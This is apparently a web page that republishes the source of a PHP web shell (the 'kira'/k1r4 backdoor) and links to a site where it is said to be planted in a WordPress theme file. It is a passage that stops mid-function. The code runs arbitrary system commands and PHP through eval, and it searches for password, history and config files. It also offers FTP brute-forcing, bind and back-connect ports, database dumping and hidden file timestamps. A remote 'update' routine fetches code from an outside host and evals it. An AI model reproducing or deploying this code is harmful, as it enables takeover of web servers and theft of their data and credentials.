Please wach this space for a more in depth analysis.
To see the shell in action please visit. http://mabasketballclub.org/wp-content/themes/twentytwelve/footer.php
Please wach this space for a more in depth analysis.
To see the shell in action please visit. http://mabasketballclub.org/wp-content/themes/twentytwelve/footer.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
//Starting calls | |
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} | |
error_reporting(5); | |
@ignore_user_abort(TRUE); | |
@set_magic_quotes_runtime(0); | |
$win = strtolower(substr(PHP_OS,0,3)) == "win"; | |
define("starttime",getmicrotime()); | |
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} | |
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); | |
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} | |
$shver = "Shell [ci] .Biz was here"; //Current version | |
if (!empty($unset_surl)) {setcookie("k1r4_surl"); $surl = "";} | |
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("k1r4_surl",$surl);} | |
else {$surl = $_REQUEST["k1r4_surl"]; //Set this cookie for manual SURL | |
} | |
$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. | |
if ($surl_autofill_include and !$_REQUEST["k1r4_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} | |
if (empty($surl)) | |
{ | |
$surl = "?".$includestr; //Self url | |
} | |
$surl = htmlspecialchars($surl); | |
$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. | |
$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","") | |
$login_txt = "Restricted area"; //http-auth message. | |
$accessdeniedmess = " Shell [ci] . Biz ".$shver.": access denied"; | |
$gzipencode = TRUE; //Encode with gzip? | |
$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) | |
$k1r4_updateurl = "http://emp3ror.com/kira//update/"; //Update server | |
$k1r4_sourcesurl = "http://emp3ror.com/kira/"; //Sources-server | |
$filestealth = TRUE; //if TRUE, don't change modify- and access-time | |
$donated_html = "<center><b>Owned by Shell [ci] .Biz</b></center>"; | |
/* If you publish free shell and you wish | |
add link to your site or any other information, | |
put here your html. */ | |
$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. | |
$curdir = "./"; //start folder | |
//$curdir = getenv("DOCUMENT_ROOT"); | |
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) | |
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) | |
$log_email = "yarakam@gmail.com"; //Default e-mail for sending logs | |
$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending | |
$sort_save = TRUE; //If TRUE then save sorting-position using cookies. | |
// Registered file-types. | |
// array( | |
// "{action1}"=>array("ext1","ext2","ext3",...), | |
// "{action2}"=>array("ext4","ext5","ext6",...), | |
// ... | |
// ) | |
$ftypes = array( | |
"html"=>array("html","htm","shtml"), | |
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), | |
"exe"=>array("sh","install","bat","cmd"), | |
"ini"=>array("ini","inf"), | |
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), | |
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), | |
"sdb"=>array("sdb"), | |
"phpsess"=>array("sess"), | |
"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") | |
); | |
// Registered executable file-types. | |
// array( | |
// string "command{i}"=>array("ext1","ext2","ext3",...), | |
// ... | |
// ) | |
// {command}: %f% = filename | |
$exeftypes = array( | |
getenv("PHPRC")." -q %f%" => array("php","php3","php4"), | |
"perl %f%" => array("pl","cgi") | |
); | |
/* Highlighted files. | |
array( | |
i=>array({regexp},{type},{opentag},{closetag},{break}) | |
... | |
) | |
string {regexp} - regular exp. | |
int {type}: | |
0 - files and folders (as default), | |
1 - files only, 2 - folders only | |
string {opentag} - open html-tag, e.g. "<b>" (default) | |
string {closetag} - close html-tag, e.g. "</b>" (default) | |
bool {break} - if TRUE and found match then break | |
*/ | |
$regxp_highlight = array( | |
array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example | |
array("config.php",1) // example | |
); | |
$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. | |
// array (i=>{letter} ...); string {letter} - letter of a drive | |
//$safemode_diskettes = range("a","z"); | |
$hexdump_lines = 8;// lines in hex preview file | |
$hexdump_rows = 24;// 16, 24 or 32 bytes in one line | |
$nixpwdperpage = 100; // Get first N lines from /etc/passwd | |
$bindport_pass = "k1r4"; // default password for binding | |
$bindport_port = "31373"; // default port for binding | |
$bc_port = "31373"; // default port for back-connect | |
$datapipe_localport = "8081"; // default port for datapipe | |
// Command-aliases | |
if (!$win) | |
{ | |
$cmdaliases = array( | |
array("-----------------------------------------------------------", "ls -la"), | |
array("find all suid files", "find / -type f -perm -04000 -ls"), | |
array("find suid files in current dir", "find . -type f -perm -04000 -ls"), | |
array("find all sgid files", "find / -type f -perm -02000 -ls"), | |
array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), | |
array("find config.inc.php files", "find / -type f -name config.inc.php"), | |
array("find config* files", "find / -type f -name \"config*\""), | |
array("find config* files in current dir", "find . -type f -name \"config*\""), | |
array("find all writable folders and files", "find / -perm -2 -ls"), | |
array("find all writable folders and files in current dir", "find . -perm -2 -ls"), | |
array("find all service.pwd files", "find / -type f -name service.pwd"), | |
array("find service.pwd files in current dir", "find . -type f -name service.pwd"), | |
array("find all .htpasswd files", "find / -type f -name .htpasswd"), | |
array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), | |
array("find all .bash_history files", "find / -type f -name .bash_history"), | |
array("find .bash_history files in current dir", "find . -type f -name .bash_history"), | |
array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), | |
array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), | |
array("list file attributes on a Linux second extended file system", "lsattr -va"), | |
array("show opened ports", "netstat -an | grep -i listen") | |
); | |
} | |
else | |
{ | |
$cmdaliases = array( | |
array("-----------------------------------------------------------", "dir"), | |
array("show opened ports", "netstat -an") | |
); | |
} | |
$sess_cookie = "k1r4vars"; // Cookie-variable name | |
$usefsbuff = TRUE; //Buffer-function | |
$copy_unset = FALSE; //Remove copied files from buffer after pasting | |
//Quick launch | |
$quicklaunch = array( | |
array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), | |
array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), | |
array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), | |
array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), | |
array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), | |
array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), | |
array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), | |
array("<b>Encoder</b>",$surl."act=encoder&d=%d"), | |
array("<b>Tools</b>",$surl."act=tools&d=%d"), | |
array("<b>Proc.</b>",$surl."act=processes&d=%d"), | |
array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"), | |
array("<b>Sec.</b>",$surl."act=security&d=%d"), | |
array("<b>SQL</b>",$surl."act=sql&d=%d"), | |
array("<b>PHP-code</b>",$surl."act=eval&d=%d"), | |
array("<b>Update</b>",$surl."act=update&d=%d"), | |
array("<b>Feedback</b>",$surl."act=feedback&d=%d"), | |
array("<b>Self remove</b>",$surl."act=selfremove"), | |
array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()") | |
); | |
//Highlight-code colors | |
$highlight_background = "#c0c0c0"; | |
$highlight_bg = "#FFFFFF"; | |
$highlight_comment = "#6A6A6A"; | |
$highlight_default = "#0000BB"; | |
$highlight_html = "#1300FF"; | |
$highlight_keyword = "#007700"; | |
$highlight_string = "#000000"; | |
@$f = $_REQUEST["f"]; | |
@extract($_REQUEST["k1r4cook"]); | |
// \/Next code isn't for editing\/ | |
@set_time_limit(0); | |
$tmp = array(); | |
foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} | |
$s = "!^(".implode("|",$tmp).")$!i"; | |
if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://google.com/releases/ckira\">kira</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} | |
if (!empty($login)) | |
{ | |
if (empty($md5_pass)) {$md5_pass = md5($pass);} | |
if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) | |
{ | |
if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |<br>"," ",$donated_html));} | |
header("WWW-Authenticate: Basic realm=\"kira ".$shver.": ".$login_txt."\""); | |
header("HTTP/1.0 401 Unauthorized"); | |
exit($accessdeniedmess); | |
} | |
} | |
if ($act != "img") | |
{ | |
$lastdir = realpath("."); | |
chdir($curdir); | |
if ($selfwrite or $updatenow) {@ob_clean(); k1r4_getupdate($selfwrite,1); exit;} | |
$sess_data = unserialize($_COOKIE["$sess_cookie"]); | |
if (!is_array($sess_data)) {$sess_data = array();} | |
if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} | |
if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} | |
$disablefunc = @ini_get("disable_functions"); | |
if (!empty($disablefunc)) | |
{ | |
$disablefunc = str_replace(" ","",$disablefunc); | |
$disablefunc = explode(",",$disablefunc); | |
} | |
if (!function_exists("k1r4_buff_prepare")) | |
{ | |
function k1r4_buff_prepare() | |
{ | |
global $sess_data; | |
global $act; | |
foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} | |
foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} | |
$sess_data["copy"] = array_unique($sess_data["copy"]); | |
$sess_data["cut"] = array_unique($sess_data["cut"]); | |
sort($sess_data["copy"]); | |
sort($sess_data["cut"]); | |
if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} | |
else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} | |
} | |
} | |
k1r4_buff_prepare(); | |
if (!function_exists("k1r4_sess_put")) | |
{ | |
function k1r4_sess_put($data) | |
{ | |
global $sess_cookie; | |
global $sess_data; | |
k1r4_buff_prepare(); | |
$sess_data = $data; | |
$data = serialize($data); | |
setcookie($sess_cookie,$data); | |
} | |
} | |
foreach (array("sort","sql_sort") as $v) | |
{ | |
if (!empty($_GET[$v])) {$$v = $_GET[$v];} | |
if (!empty($_POST[$v])) {$$v = $_POST[$v];} | |
} | |
if ($sort_save) | |
{ | |
if (!empty($sort)) {setcookie("sort",$sort);} | |
if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} | |
} | |
if (!function_exists("str2mini")) | |
{ | |
function str2mini($content,$len) | |
{ | |
if (strlen($content) > $len) | |
{ | |
$len = ceil($len/2) - 2; | |
return substr($content, 0,$len)."...".substr($content,-$len); | |
} | |
else {return $content;} | |
} | |
} | |
if (!function_exists("view_size")) | |
{ | |
function view_size($size) | |
{ | |
if (!is_numeric($size)) {return FALSE;} | |
else | |
{ | |
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} | |
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} | |
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} | |
else {$size = $size . " B";} | |
return $size; | |
} | |
} | |
} | |
if (!function_exists("fs_copy_dir")) | |
{ | |
function fs_copy_dir($d,$t) | |
{ | |
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | |
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | |
$h = opendir($d); | |
while (($o = readdir($h)) !== FALSE) | |
{ | |
if (($o != ".") and ($o != "..")) | |
{ | |
if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} | |
else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} | |
if (!$ret) {return $ret;} | |
} | |
} | |
closedir($h); | |
return TRUE; | |
} | |
} | |
if (!function_exists("fs_copy_obj")) | |
{ | |
function fs_copy_obj($d,$t) | |
{ | |
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | |
$t = str_replace("\\",DIRECTORY_SEPARATOR,$t); | |
if (!is_dir(dirname($t))) {mkdir(dirname($t));} | |
if (is_dir($d)) | |
{ | |
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | |
if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} | |
return fs_copy_dir($d,$t); | |
} | |
elseif (is_file($d)) {return copy($d,$t);} | |
else {return FALSE;} | |
} | |
} | |
if (!function_exists("fs_move_dir")) | |
{ | |
function fs_move_dir($d,$t) | |
{ | |
$h = opendir($d); | |
if (!is_dir($t)) {mkdir($t);} | |
while (($o = readdir($h)) !== FALSE) | |
{ | |
if (($o != ".") and ($o != "..")) | |
{ | |
$ret = TRUE; | |
if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} | |
else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} | |
if (!$ret) {return $ret;} | |
} | |
} | |
closedir($h); | |
return TRUE; | |
} | |
} | |
if (!function_exists("fs_move_obj")) | |
{ | |
function fs_move_obj($d,$t) | |
{ | |
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | |
$t = str_replace("\\",DIRECTORY_SEPARATOR,$t); | |
if (is_dir($d)) | |
{ | |
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | |
if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} | |
return fs_move_dir($d,$t); | |
} | |
elseif (is_file($d)) | |
{ | |
if(copy($d,$t)) {return unlink($d);} | |
else {unlink($t); return FALSE;} | |
} | |
else {return FALSE;} | |
} | |
} | |
if (!function_exists("fs_rmdir")) | |
{ | |
function fs_rmdir($d) | |
{ | |
$h = opendir($d); | |
while (($o = readdir($h)) !== FALSE) | |
{ | |
if (($o != ".") and ($o != "..")) | |
{ | |
if (!is_dir($d.$o)) {unlink($d.$o);} | |
else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} | |
} | |
} | |
closedir($h); | |
rmdir($d); | |
return !is_dir($d); | |
} | |
} | |
if (!function_exists("fs_rmobj")) | |
{ | |
function fs_rmobj($o) | |
{ | |
$o = str_replace("\\",DIRECTORY_SEPARATOR,$o); | |
if (is_dir($o)) | |
{ | |
if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} | |
return fs_rmdir($o); | |
} | |
elseif (is_file($o)) {return unlink($o);} | |
else {return FALSE;} | |
} | |
} | |
if (!function_exists("myshellexec")) | |
{ | |
function myshellexec($cmd) | |
{ | |
global $disablefunc; | |
$result = ""; | |
if (!empty($cmd)) | |
{ | |
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} | |
elseif (($result = `$cmd`) !== FALSE) {} | |
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} | |
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} | |
elseif (is_resource($fp = popen($cmd,"r"))) | |
{ | |
$result = ""; | |
while(!feof($fp)) {$result .= fread($fp,1024);} | |
pclose($fp); | |
} | |
} | |
return $result; | |
} | |
} | |
if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} | |
if (!function_exists("view_perms")) | |
{ | |
function view_perms($mode) | |
{ | |
if (($mode & 0xC000) === 0xC000) {$type = "s";} | |
elseif (($mode & 0x4000) === 0x4000) {$type = "d";} | |
elseif (($mode & 0xA000) === 0xA000) {$type = "l";} | |
elseif (($mode & 0x8000) === 0x8000) {$type = "-";} | |
elseif (($mode & 0x6000) === 0x6000) {$type = "b";} | |
elseif (($mode & 0x2000) === 0x2000) {$type = "c";} | |
elseif (($mode & 0x1000) === 0x1000) {$type = "p";} | |
else {$type = "?";} | |
$owner["read"] = ($mode & 00400)?"r":"-"; | |
$owner["write"] = ($mode & 00200)?"w":"-"; | |
$owner["execute"] = ($mode & 00100)?"x":"-"; | |
$group["read"] = ($mode & 00040)?"r":"-"; | |
$group["write"] = ($mode & 00020)?"w":"-"; | |
$group["execute"] = ($mode & 00010)?"x":"-"; | |
$world["read"] = ($mode & 00004)?"r":"-"; | |
$world["write"] = ($mode & 00002)? "w":"-"; | |
$world["execute"] = ($mode & 00001)?"x":"-"; | |
if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} | |
if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} | |
if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} | |
return $type.join("",$owner).join("",$group).join("",$world); | |
} | |
} | |
if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} | |
if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} | |
if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} | |
if (!function_exists("parse_perms")) | |
{ | |
function parse_perms($mode) | |
{ | |
if (($mode & 0xC000) === 0xC000) {$t = "s";} | |
elseif (($mode & 0x4000) === 0x4000) {$t = "d";} | |
elseif (($mode & 0xA000) === 0xA000) {$t = "l";} | |
elseif (($mode & 0x8000) === 0x8000) {$t = "-";} | |
elseif (($mode & 0x6000) === 0x6000) {$t = "b";} | |
elseif (($mode & 0x2000) === 0x2000) {$t = "c";} | |
elseif (($mode & 0x1000) === 0x1000) {$t = "p";} | |
else {$t = "?";} | |
$o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; | |
$g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; | |
$w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; | |
return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); | |
} | |
} | |
if (!function_exists("parsesort")) | |
{ | |
function parsesort($sort) | |
{ | |
$one = intval($sort); | |
$second = substr($sort,-1); | |
if ($second != "d") {$second = "a";} | |
return array($one,$second); | |
} | |
} | |
if (!function_exists("view_perms_color")) | |
{ | |
function view_perms_color($o) | |
{ | |
if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} | |
elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} | |
else {return "<font color=green>".view_perms(fileperms($o))."</font>";} | |
} | |
} | |
if (!function_exists("k1r4getsource")) | |
{ | |
function k1r4getsource($fn) | |
{ | |
global $k1r4_sourcesurl; | |
$array = array( | |
"k1r4_bindport.pl" => "k1r4_bindport_pl.txt", | |
"k1r4_bindport.c" => "k1r4_bindport_c.txt", | |
"k1r4_backconn.pl" => "k1r4_backconn_pl.txt", | |
"k1r4_backconn.c" => "k1r4_backconn_c.txt", | |
"k1r4_datapipe.pl" => "k1r4_datapipe_pl.txt", | |
"k1r4_datapipe.c" => "k1r4_datapipe_c.txt", | |
); | |
$name = $array[$fn]; | |
if ($name) {return file_get_contents($k1r4_sourcesurl.$name);} | |
else {return FALSE;} | |
} | |
} | |
if (!function_exists("k1r4_getupdate")) | |
{ | |
function k1r4_getupdate($update = TRUE) | |
{ | |
$url = $GLOBALS["k1r4_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; | |
$data = @file_get_contents($url); | |
if (!$data) {return "Can't connect to update-server!";} | |
else | |
{ | |
$data = ltrim($data); | |
$string = substr($data,3,ord($data{2})); | |
if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} | |
if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} | |
if ($data{0} == "\x99" and $data{1} == "\x03") | |
{ | |
$string = explode("\x01",$string); | |
if ($update) | |
{ | |
$confvars = array(); | |
$sourceurl = $string[0]; | |
$source = file_get_contents($sourceurl); | |
if (!$source) {return "Can't fetch update!";} | |
else | |
{ | |
$fp = fopen(__FILE__,"w"); | |
if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download kira.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} | |
else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} | |
} | |
} | |
else {return "New version are available: ".$string[1];} | |
} | |
elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} | |
else {return "Error in protocol: segmentation failed! (".$data.") ";} | |
} | |
} | |
} | |
if (!function_exists("mysql_dump")) | |
{ | |
function mysql_dump($set) | |
{ | |
global $shver; | |
$sock = $set["sock"]; | |
$db = $set["db"]; | |
$print = $set["print"]; | |
$nl2br = $set["nl2br"]; | |
$file = $set["file"]; | |
$add_drop = $set["add_drop"]; | |
$tabs = $set["tabs"]; | |
$onlytabs = $set["onlytabs"]; | |
$ret = array(); | |
$ret["err"] = array(); | |
if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} | |
if (empty($db)) {$db = "db";} | |
if (empty($print)) {$print = 0;} | |
if (empty($nl2br)) {$nl2br = 0;} | |
if (empty($add_drop)) {$add_drop = TRUE;} | |
if (empty($file)) | |
{ | |
$file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; | |
} | |
if (!is_array($tabs)) {$tabs = array();} | |
if (empty($add_drop)) {$add_drop = TRUE;} | |
if (sizeof($tabs) == 0) | |
{ | |
// retrive tables-list | |
$res = mysql_query("SHOW TABLES FROM ".$db, $sock); | |
if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} | |
} | |
$out = "# Dumped by kira.SQL v. ".$shver." | |
# Home page: http://google.com | |
# | |
# Host settings: | |
# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." | |
# Date: ".date("d.m.Y H:i:s")." | |
# DB: \"".$db."\" | |
#--------------------------------------------------------- | |
"; | |
$c = count($onlytabs); | |
foreach($tabs as $tab) | |
{ | |
if ((in_array($tab,$onlytabs)) or (!$c)) | |
{ | |
if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} | |
// recieve query for create table structure | |
$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); | |
if (!$res) {$ret["err"][] = mysql_smarterror();} | |
else | |
{ | |
$row = mysql_fetch_row($res); | |
$out .= $row["1"].";\n\n"; | |
// recieve table variables | |
$res = mysql_query("SELECT * FROM `$tab`", $sock); | |
if (mysql_num_rows($res) > 0) | |
{ | |
while ($row = mysql_fetch_assoc($res)) | |
{ | |
$keys = implode("`, `", array_keys($row)); | |
$values = array_values($row); | |
foreach($values as $k=>$v) {$values[$k] = addslashes($v);} | |
$values = implode("', '", $values); | |
$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; | |
$out .= $sql; | |
} | |
} | |
} | |
} | |
} | |
$out .= "#---------------------------------------------------------------------------------\n\n"; | |
if ($file) | |
{ | |
$fp = fopen($file, "w"); | |
if (!$fp) {$ret["err"][] = 2;} | |
else | |
{ | |
fwrite ($fp, $out); | |
fclose ($fp); | |
} | |
} | |
if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} | |
return $out; | |
} | |
} | |
if (!function_exists("mysql_buildwhere")) | |
{ | |
function mysql_buildwhere($array,$sep=" and",$functs=array()) | |
{ | |
if (!is_array($array)) {$array = array();} | |
$result = ""; | |
foreach($array as $k=>$v) | |
{ | |
$value = ""; | |
if (!empty($functs[$k])) {$value .= $functs[$k]."(";} | |
$value .= "'".addslashes($v)."'"; | |
if (!empty($functs[$k])) {$value .= ")";} | |
$result .= "`".$k."` = ".$value.$sep; | |
} | |
$result = substr($result,0,strlen($result)-strlen($sep)); | |
return $result; | |
} | |
} | |
if (!function_exists("mysql_fetch_all")) | |
{ | |
function mysql_fetch_all($query,$sock) | |
{ | |
if ($sock) {$result = mysql_query($query,$sock);} | |
else {$result = mysql_query($query);} | |
$array = array(); | |
while ($row = mysql_fetch_array($result)) {$array[] = $row;} | |
mysql_free_result($result); | |
return $array; | |
} | |
} | |
if (!function_exists("mysql_smarterror")) | |
{ | |
function mysql_smarterror($type,$sock) | |
{ | |
if ($sock) {$error = mysql_error($sock);} | |
else {$error = mysql_error();} | |
$error = htmlspecialchars($error); | |
return $error; | |
} | |
} | |
if (!function_exists("mysql_query_form")) | |
{ | |
function mysql_query_form() | |
{ | |
global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; | |
if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} | |
if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} | |
if ((!$submit) or ($sql_act)) | |
{ | |
echo "<table border=0><tr><td><form name=\"k1r4_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>"; | |
if ($tbl_struct) | |
{ | |
echo "<td valign=\"top\"><b>Fields:</b><br>"; | |
foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.k1r4_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} | |
echo "</td></tr></table>"; | |
} | |
} | |
if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} | |
} | |
} | |
if (!function_exists("mysql_create_db")) | |
{ | |
function mysql_create_db($db,$sock="") | |
{ | |
$sql = "CREATE DATABASE `".addslashes($db)."`;"; | |
if ($sock) {return mysql_query($sql,$sock);} | |
else {return mysql_query($sql);} | |
} | |
} | |
if (!function_exists("mysql_query_parse")) | |
{ | |
function mysql_query_parse($query) | |
{ | |
$query = trim($query); | |
$arr = explode (" ",$query); | |
/*array array() | |
{ | |
"METHOD"=>array(output_type), | |
"METHOD1"... | |
... | |
} | |
if output_type == 0, no output, | |
if output_type == 1, no output if no error | |
if output_type == 2, output without control-buttons | |
if output_type == 3, output with control-buttons | |
*/ | |
$types = array( | |
"SELECT"=>array(3,1), | |
"SHOW"=>array(2,1), | |
"DELETE"=>array(1), | |
"DROP"=>array(1) | |
); | |
$result = array(); | |
$op = strtoupper($arr[0]); | |
if (is_array($types[$op])) | |
{ | |
$result["propertions"] = $types[$op]; | |
$result["query"] = $query; | |
if ($types[$op] == 2) | |
{ | |
foreach($arr as $k=>$v) | |
{ | |
if (strtoupper($v) == "LIMIT") | |
{ | |
$result["limit"] = $arr[$k+1]; | |
